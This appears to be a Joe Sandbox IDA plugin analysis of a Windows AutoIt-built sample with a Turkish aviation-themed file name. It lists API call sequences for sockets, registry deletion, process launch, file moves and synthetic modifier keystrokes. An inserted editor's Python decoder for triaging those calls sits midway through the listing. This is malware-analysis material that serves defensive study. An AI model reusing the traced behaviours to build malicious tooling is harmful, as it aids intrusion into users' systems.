• GetSystemMetrics.USER32(0000000F), ref: 0102D49C
• MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0102D6D7
• SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0102D6F5
• SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0102D716
• ShowWindow.USER32(00000003,00000000), ref: 0102D735
• InvalidateRect.USER32(?,00000000,00000001), ref: 0102D75A
• DefDlgProcW.USER32(?,00000005,?,?), ref: 0102D77D
Similarity
• API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
• String ID:
• API String ID: 1211466189-0
• Opcode ID: 69d131c8ece6814a21e3ac501afe941feefdd2f306a4d3f3426ac350cfe7edb3
• Instruction ID: 3e5228dcbb32cd525ff821c07a5fc2cab25d472005d792c2b978813c9a2953d7
• Opcode Fuzzy Hash: 69d131c8ece6814a21e3ac501afe941feefdd2f306a4d3f3426ac350cfe7edb3
• Instruction Fuzzy Hash: 3AB17C71500225AFDF24CFA8C5897AD7BF1FF48701F0480A9ED889F299E779A950CB90
APIs
  • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
  • Part of subcall function 01020E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0101FDAD,?,?), ref: 01020E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0101FDEE
Similarity
• API ID: BuffCharConnectRegistryUpper_memmove
• String ID:
• API String ID: 3479070676-0
APIs
• ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FDC1C7,00000004,00000000,00000000,00000000), ref: 00FA2ACF
• ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00FDC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00FA2B17
• ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00FDC1C7,00000004,00000000,00000000,00000000), ref: 00FDC21A
• ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FDC1C7,00000004,00000000,00000000,00000000), ref: 00FDC286
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 010070DD
  • Part of subcall function 00FC0DB6: std::exception::exception.LIBCMT ref: 00FC0DEC
  • Part of subcall function 00FC0DB6: __CxxThrowException@8.LIBCMT ref: 00FC0E01
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 01007114
• EnterCriticalSection.KERNEL32(?), ref: 01007130
• _memmove.LIBCMT ref: 0100717E
• _memmove.LIBCMT ref: 0100719B
• LeaveCriticalSection.KERNEL32(?), ref: 010071AA
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 010071BF
• InterlockedExchange.KERNEL32(?,000001F6), ref: 010071DE
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
• String ID:
• API String ID: 256516436-0
APIs
• DeleteObject.GDI32(00000000), ref: 010261EB
• GetDC.USER32(00000000), ref: 010261F3
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 010261FE
• ReleaseDC.USER32(00000000,00000000), ref: 0102620A
• CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 01026246
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 01026257
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0102902A,?,?,000000FF,00000000,?,000000FF,?), ref: 01026291
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 010262B1
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
APIs
Similarity
• API ID: _memcmp
• String ID:
• API String ID: 2931989736-0
APIs
  • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
  • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
  • Part of subcall function 00FBFC86: _wcscpy.LIBCMT ref: 00FBFCA9
• _wcstok.LIBCMT ref: 0100EC94
• _wcscpy.LIBCMT ref: 0100ED23
• _memset.LIBCMT ref: 0100ED56
Strings
Similarity
• API ID: _wcscpy$__itow__swprintf_memset_wcstok
• String ID: X
• API String ID: 774024439-3081909835
APIs
• __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 01016C00
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 01016C21
• WSAGetLastError.WSOCK32(00000000), ref: 01016C34
• htons.WSOCK32(?,?,?,00000000,?), ref: 01016CEA
• inet_ntoa.WSOCK32(?), ref: 01016CA7
  • Part of subcall function 00FFA7E9: _strlen.LIBCMT ref: 00FFA7F3
  • Part of subcall function 00FFA7E9: _memmove.LIBCMT ref: 00FFA815
• _strlen.LIBCMT ref: 01016D44
• _memmove.LIBCMT ref: 01016DAD
Similarity
• API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
• String ID:
• API String ID: 3619996494-0
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b9a56be9b8bc7835868ad5ad0500c022a10c4c25d334b775be9c92be452eb26f
• Instruction ID: 036475ade1cd459a832e0d3324d4cd58488499731c7407b1c2110c0d5a6c5829
• Opcode Fuzzy Hash: b9a56be9b8bc7835868ad5ad0500c022a10c4c25d334b775be9c92be452eb26f
• Instruction Fuzzy Hash: 18719F71904109EFCB14CF98CC44EBEBB75FF8A360F258149F915AA251C734AA51DF60
APIs
• IsWindow.USER32(011F5D60), ref: 0102B3EB
• IsWindowEnabled.USER32(011F5D60), ref: 0102B3F7
• SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0102B4DB
• SendMessageW.USER32(011F5D60,000000B0,?,?), ref: 0102B512
• IsDlgButtonChecked.USER32(?,?), ref: 0102B54F
• GetWindowLongW.USER32(011F5D60,000000EC), ref: 0102B571
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0102B589
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: MessageSendWindow$ButtonCheckedEnabledLong
• String ID:
• API String ID: 4072528602-0
• Opcode ID: 8589def97e8e8f46742a53010930c0a9ceb0621b8286fa279f75d11b1683cb4e
• Instruction ID: 0609c386fcf8abcedee6d367954e9659ba1b6070b1420e6a7f1bb316c3217010
• Opcode Fuzzy Hash: 8589def97e8e8f46742a53010930c0a9ceb0621b8286fa279f75d11b1683cb4e
• Instruction Fuzzy Hash: 37718F34604225AFEB759F68C8D4FBA7BF9FF09340F148099EAC597261CB36A940DB50
APIs
• _memset.LIBCMT ref: 0101F448
• _memset.LIBCMT ref: 0101F511
• ShellExecuteExW.SHELL32(?), ref: 0101F556
  • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
  • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
  • Part of subcall function 00FBFC86: _wcscpy.LIBCMT ref: 00FBFCA9
• GetProcessId.KERNEL32(00000000), ref: 0101F5CD
• CloseHandle.KERNEL32(00000000), ref: 0101F5FC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
• String ID: @
• API String ID: 3522835683-2766056989
• Opcode ID: ba03f1e5bf74a48bb0ff4c5002581711b5367228b0f7a68d69ad338087ce1185
• Instruction ID: beeb22add71846dd561545a583d3c3dfec17139c650440817fa050b6c383dc16
• Opcode Fuzzy Hash: ba03f1e5bf74a48bb0ff4c5002581711b5367228b0f7a68d69ad338087ce1185
• Instruction Fuzzy Hash: CF61C0B1A0061ADFCB14DF68C8819AEBBF5FF49310F148069E856AB351CB78AD45DF90
APIs
• GetParent.USER32(?), ref: 01000F8C
• GetKeyboardState.USER32(?), ref: 01000FA1
• SetKeyboardState.USER32(?), ref: 01001002
• PostMessageW.USER32(?,00000101,00000010,?), ref: 01001030
• PostMessageW.USER32(?,00000101,00000011,?), ref: 0100104F
• PostMessageW.USER32(?,00000101,00000012,?), ref: 01001095
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 010010B8
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: f7c72fa2142d1814ba6c5bd6ca6da58a6d7fa231a7454290cee26cbfe92566bc
• Instruction ID: 8d528ebbc8696f1ade33b70bc75142b4e68785861a8174881bece13b37317f32
• Opcode Fuzzy Hash: f7c72fa2142d1814ba6c5bd6ca6da58a6d7fa231a7454290cee26cbfe92566bc
• Instruction Fuzzy Hash: C451C3B06086D639FB3786388845BBABEE95B06344F0885CDF2D4468C3C2E9E8D8D751
APIs
• GetParent.USER32(00000000), ref: 01000DA5
• GetKeyboardState.USER32(?), ref: 01000DBA
• SetKeyboardState.USER32(?), ref: 01000E1B
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 01000E47
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 01000E64
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 01000EA8
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 01000EC9
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: e1aec8469f27df977367b8bbca7cbd10fe1428a898561eb613ad6901ecdb3a4a
• Instruction ID: e4834daffa0b993d6a236c0d363b90b027ad4cb369b5f25c8c8ce0107163880c
• Opcode Fuzzy Hash: e1aec8469f27df977367b8bbca7cbd10fe1428a898561eb613ad6901ecdb3a4a
• Instruction Fuzzy Hash: 2451F6A05087D63DFB3386388C45BBA7EE95B06380F0884CDF2D5568C6C395E898E760
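The two routines listed above (API ID MessagePost$KeyboardState$Parent) read and patch the keyboard state and then post WM_KEYUP (0x101) and WM_KEYDOWN (0x100) for the modifier virtual keys 0x10, 0x11, 0x12 and 0x5B (VK_SHIFT, VK_CONTROL, VK_MENU, VK_LWIN) to a window; the earlier dialog routine sends WM_NCLBUTTONDOWN (0xA1) with wParam 2 (HTCAPTION). Reading these raw numbers by hand across hundreds of function entries is error-prone, so the following Python decoder, added here as an editor's example and not part of the Joe Sandbox report or of the analysed sample, parses "APIs" lines in the report's own format, names the message and virtual-key constants it knows (values from winuser.h; anything else stays as hex) and attaches triage tags. The tag names are this example's own, not Joe Sandbox signature names, and the sample lines are copied from the listing above.

```python
import re

# Win32 constants from winuser.h; values the tables do not cover are printed as raw hex.
WM_NAMES = {
    0x0100: "WM_KEYDOWN",
    0x0101: "WM_KEYUP",
    0x00A1: "WM_NCLBUTTONDOWN",
    0x00B0: "EM_GETSEL",
}
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}
HT_NAMES = {0x02: "HTCAPTION"}  # hit-test code carried in wParam of WM_NCLBUTTONDOWN

# One line of an "APIs" list in the report:  • Name.MODULE(args), ref: ADDR
# The parenthesised argument list is optional (e.g. "DrawMenuBar.USER32 ref: ...").
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(\w+)\.(\w+)(?:\((.*?)\))?,?\s*ref:\s*([0-9A-Fa-f]+)"
)


def _arg(token):
    """'?' means the plugin could not recover the value; keep that as None."""
    token = token.strip()
    return None if token in ("", "?") else int(token, 16)


def parse_api_lines(text):
    """Turn report API lines into dicts: api, module, args (list of int|None), ref."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        api, module, args, ref = m.groups()
        calls.append({
            "api": api,
            "module": module,
            "args": [_arg(a) for a in args.split(",")] if args else [],
            "ref": int(ref, 16),
        })
    return calls


def _msg_and_wparam(call):
    """(msg, wParam) for a window-message call, else (None, None)."""
    if call["api"] not in ("PostMessageW", "SendMessageW") or len(call["args"]) < 3:
        return None, None
    return call["args"][1], call["args"][2]


def decode_message_call(call):
    """Symbolic rendering of a window-message call, or None if it is not one."""
    msg, wparam = _msg_and_wparam(call)
    if msg is None:
        return None
    mname = WM_NAMES.get(msg, f"0x{msg:04X}")
    if wparam is None:
        wname = "?"
    elif msg in (0x0100, 0x0101):
        wname = VK_NAMES.get(wparam, f"0x{wparam:02X}")
    elif msg == 0x00A1:
        wname = HT_NAMES.get(wparam, f"0x{wparam:02X}")
    else:
        wname = f"0x{wparam:X}"
    return f"{call['api']}({mname}, wParam={wname}) @ {call['ref']:08X}"


def classify(calls):
    """Triage tags (names chosen for this example) derived from the API pattern."""
    apis = {c["api"] for c in calls}
    tags = []
    key_posts = [c for c in calls
                 if c["api"] == "PostMessageW" and _msg_and_wparam(c)[0] in (0x0100, 0x0101)]
    if key_posts and {"GetKeyboardState", "SetKeyboardState"} <= apis:
        tags.append("synthetic-modifier-keystrokes")
    if any(_msg_and_wparam(c) == (0x00A1, 0x02) for c in calls):
        tags.append("caption-drag-emulation")
    return tags


def triage(text):
    calls = parse_api_lines(text)
    decoded = [d for d in (decode_message_call(c) for c in calls) if d]
    return decoded, classify(calls)


# Lines copied from the report listing above.
KEYDOWN_ROUTINE = """
• GetParent.USER32(00000000), ref: 01000DA5
• GetKeyboardState.USER32(?), ref: 01000DBA
• SetKeyboardState.USER32(?), ref: 01000E1B
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 01000E47
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 01000E64
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 01000EA8
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 01000EC9
"""
DIALOG_ROUTINE = """
• IsWindow.USER32(011F5D60), ref: 0102B3EB
• SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0102B4DB
• SendMessageW.USER32(011F5D60,000000B0,?,?), ref: 0102B512
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0102B589
"""

if __name__ == "__main__":
    for name, text in (("keydown", KEYDOWN_ROUTINE), ("dialog", DIALOG_ROUTINE)):
        decoded, tags = triage(text)
        print(name, tags)
        for line in decoded:
            print("  ", line)
```

Unknown message numbers such as 0x41C are deliberately left as hex rather than guessed; extend WM_NAMES only with values you have checked against the SDK headers for the control class in question.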
APIs
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: _wcsncpy$LocalTime
• String ID:
• API String ID: 2945705084-0
• Opcode ID: 6ed4c51d9ae0466b7589a3c108e0e8263567a11c3af033d153d3a3c120c6c46a
• Instruction ID: 91977aee791a2e7c879593fb8ea430bbc4009b1ffd8f86a93264e39ac75395f1
• Opcode Fuzzy Hash: 6ed4c51d9ae0466b7589a3c108e0e8263567a11c3af033d153d3a3c120c6c46a
• Instruction Fuzzy Hash: 6A41E765C5020976DB11EBB48C47ECFB7B8AF04350F40885AE649E3161EB38A745D7A6
APIs
  • Part of subcall function 0100466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,01003697,?), ref: 0100468B
  • Part of subcall function 0100466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,01003697,?), ref: 010046A4
• lstrcmpiW.KERNEL32(?,?), ref: 010036B7
• _wcscmp.LIBCMT ref: 010036D3
• MoveFileW.KERNEL32(?,?), ref: 010036EB
• _wcscat.LIBCMT ref: 01003733
• SHFileOperationW.SHELL32(?), ref: 0100379F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
• String ID: \*.*
• API String ID: 1377345388-1173974218
• Opcode ID: bba8fcac64c4c6c57f402a4f4389ccac3eeba5418412ad7c5c0ee18d30b9234e
• Instruction ID: 76ee8ee813b8757e906c3c87652b27bd48d18dd021c60cc8e887d8821d5e95f3
• Opcode Fuzzy Hash: bba8fcac64c4c6c57f402a4f4389ccac3eeba5418412ad7c5c0ee18d30b9234e
• Instruction Fuzzy Hash: D5418171508345AEE763EF64D841ADF77E8BF89280F00486EF5C9C7291EA34D289C756

APIs
• _memset.LIBCMT ref: 010272AA
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01027351
• IsMenu.USER32(?), ref: 01027369
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 010273B1
• DrawMenuBar.USER32 ref: 010273C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Menu$Item$DrawInfoInsert_memset
• String ID: 0
• API String ID: 3866635326-4108050209
• Opcode ID: 7245e04596cfb0afbc72bcc73e35fb371b9f8bea107546bd3c62dc256709a60e
• Instruction ID: 92bbbfb3f10fb5ee84cae0c7c95f1bb8f9b51bd00b89700fd07be54b563e0806
• Opcode Fuzzy Hash: 7245e04596cfb0afbc72bcc73e35fb371b9f8bea107546bd3c62dc256709a60e
• Instruction Fuzzy Hash: 94415975A00219EFDB20DF54D885E9ABBF8FF18350F14846AFE85A7250D735A950CF90

APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 01020FD4
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 01020FFE
• FreeLibrary.KERNEL32(00000000), ref: 010210B5
  • Part of subcall function 01020FA5: RegCloseKey.ADVAPI32(?), ref: 0102101B
  • Part of subcall function 01020FA5: FreeLibrary.KERNEL32(?), ref: 0102106D
  • Part of subcall function 01020FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 01021090
• RegDeleteKeyW.ADVAPI32(?,?), ref: 01021058
Similarity
• API ID: EnumFreeLibrary$CloseDeleteOpen
• String ID:
• API String ID: 395352322-0
• Opcode ID: 266be0fa80e03cf6a510419b680e89c58e060a321a59e5d3a136ed9d2a094cb2
• Instruction ID: 2823c93cc58bc2b9ac2b89299de36bd8496ca53a1a4be617295831917afd6201
• Opcode Fuzzy Hash: 266be0fa80e03cf6a510419b680e89c58e060a321a59e5d3a136ed9d2a094cb2
• Instruction Fuzzy Hash: F7310F71A01119BFEB659F94D8C9EFFBBBCEF08340F1001A9F645A2140DA795A459BA0

APIs
• SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 010262EC
• GetWindowLongW.USER32(011F5D60,000000F0), ref: 0102631F
• GetWindowLongW.USER32(011F5D60,000000F0), ref: 01026354
• SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 01026386
• SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 010263B0
• GetWindowLongW.USER32(00000000,000000F0), ref: 010263C1
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 010263DB
Similarity
• API ID: LongWindow$MessageSend
• String ID:
• API String ID: 2178440468-0
• Opcode ID: 52600ac454b4c3fb1cbb352227911a97d320ea2e388b484f08ec69a5ba74ce41
• Instruction ID: a0cd9cc8f516fa830dcf4a04641b0e5f4e5b8e5cecf17d0401e1a6171c96aecf
• Opcode Fuzzy Hash: 52600ac454b4c3fb1cbb352227911a97d320ea2e388b484f08ec69a5ba74ce41
• Instruction Fuzzy Hash: DC310730644161AFDB31CF28D888F553BE5FB4A754F1941A4F9819F2B6CB77A840CB91

APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FFDB2E
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FFDB54
• SysAllocString.OLEAUT32(00000000), ref: 00FFDB57
• SysAllocString.OLEAUT32(?), ref: 00FFDB75
• SysFreeString.OLEAUT32(?), ref: 00FFDB7E
• StringFromGUID2.OLE32(?,?,00000028), ref: 00FFDBA3
• SysAllocString.OLEAUT32(?), ref: 00FFDBB1
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: 3b9069c3879e5722a5a2f9a96a378d0dd44a67d488f8f55a8803a91207631cb0
• Instruction ID: 6c98e479e9498a9b34798d622ea77d7696d21af411ecbaeb46109a8a44e69b6d
• Opcode Fuzzy Hash: 3b9069c3879e5722a5a2f9a96a378d0dd44a67d488f8f55a8803a91207631cb0
• Instruction Fuzzy Hash: 8421A63260121EAFDF20DEA8DC48DBB73ADEF49360B118125FB54DB260DB749C419760

APIs
  • Part of subcall function 01017D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 01017DB6
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 010161C6
• WSAGetLastError.WSOCK32(00000000), ref: 010161D5
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0101620E
• connect.WSOCK32(00000000,?,00000010), ref: 01016217
• WSAGetLastError.WSOCK32 ref: 01016221
• closesocket.WSOCK32(00000000), ref: 0101624A
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 01016263
Similarity
• API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
• String ID:
• API String ID: 910771015-0
• Opcode ID: 6b9f615879f345096546bf2b793a4c2097df736c8fcc79e97caea2fc4a3ade2d
• Instruction ID: e44cc9e17ddb805c9d592ac74007e8f52cec98289fd4f32f8f32af409a4e0de8
• Opcode Fuzzy Hash: 6b9f615879f345096546bf2b793a4c2097df736c8fcc79e97caea2fc4a3ade2d
• Instruction Fuzzy Hash: 6731A171600118ABEF20AF64CC85BBE7BF9EF45750F044069FD85E7285CBB9A9049BA1

APIs
Strings
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 1038674560-2734436370
• Opcode ID: 6aae3f584cb7cf06d0bc9a1f9e3c86583d0db75c629667d7d0a9fe2c32cbba69
• Instruction ID: 34ace9235c638d792dbf6dc840b31eceb992e276c6fc6802969d22c40a5dfed0
• Opcode Fuzzy Hash: 6aae3f584cb7cf06d0bc9a1f9e3c86583d0db75c629667d7d0a9fe2c32cbba69
• Instruction Fuzzy Hash: 8F2149736141166AD320BA34AD03FB7B398DF55360F14403DF686CA171EF949D4AF295

APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FFDC09
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FFDC2F
• SysAllocString.OLEAUT32(00000000), ref: 00FFDC32
• SysAllocString.OLEAUT32 ref: 00FFDC53
• SysFreeString.OLEAUT32 ref: 00FFDC5C
• StringFromGUID2.OLE32(?,?,00000028), ref: 00FFDC76
• SysAllocString.OLEAUT32(?), ref: 00FFDC84
                                                                                                                                    Similarity
                                                                                                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3761583154-0
                                                                                                                                    • Opcode ID: 552912cc26df7ad9593fdbe372d52715fdc09e831e818826838297ff5e9aefd7
                                                                                                                                    • Instruction ID: 11f520a9d4a581ef7f1d8862194e8675121918c7e6944f2019cdf7065ce80097
                                                                                                                                    • Opcode Fuzzy Hash: 552912cc26df7ad9593fdbe372d52715fdc09e831e818826838297ff5e9aefd7
                                                                                                                                    • Instruction Fuzzy Hash: 30218636604209AFDB20EFA8DC89DBA77EDEF09360B108125FA54CB264DBB4DC41D764
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FA1D73
                                                                                                                                      • Part of subcall function 00FA1D35: GetStockObject.GDI32(00000011), ref: 00FA1D87
                                                                                                                                      • Part of subcall function 00FA1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FA1D91
